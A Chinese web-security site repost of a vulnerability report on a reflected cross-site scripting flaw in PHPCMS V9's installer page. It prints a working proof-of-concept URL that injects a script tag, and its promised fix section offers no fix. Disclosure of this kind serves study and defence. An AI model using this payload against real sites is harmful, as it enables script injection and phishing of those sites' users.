PHPCMS V9 跨站2及修复 - 网站安全

PHPCMS V9 跨站2及修复 - 网站安全 - 自学php

来源：自学PHP网时间：2015-04-17 14:46 作者：阅读:次

[导读] 某地方么有过滤，服务器环境register_globals = On 的时候直接XSS。。。钓钓鱼。没啥用。为了rank才发出来的。。。嗯嗯。。。详细说明：/install/header.tpl.php?step=bsteps[b]=cc/titlescriptalert(11......

某地方么有过滤，
服务器环境register_globals = On 的时候直接XSS。。。
钓钓鱼。没啥用。为了rank才发出来的。。。嗯嗯。。。
详细说明：/install/header.tpl.php?step=b&steps[b]=cc</title><script>alert(111);</script>
你丫的自己测试去。为了rank才发出来的。。。嗯嗯。。。

漏洞证明：/install/header.tpl.php?step=b&steps[b]=cc</title><script>alert(111);</script>
修复方案：都那么大公司了。我还建议个毛线。

Kindeditor遍历目录漏洞及修复 - 网站安全 - 自学

PHPCMS V9敏感信息泄漏及修复 - 网站安全 - 自学p

子栏目

PHPCMS V9 跨站2及修复 - 网站安全 - 自学php

最新评论

添加评论

更多文章推荐

添加评论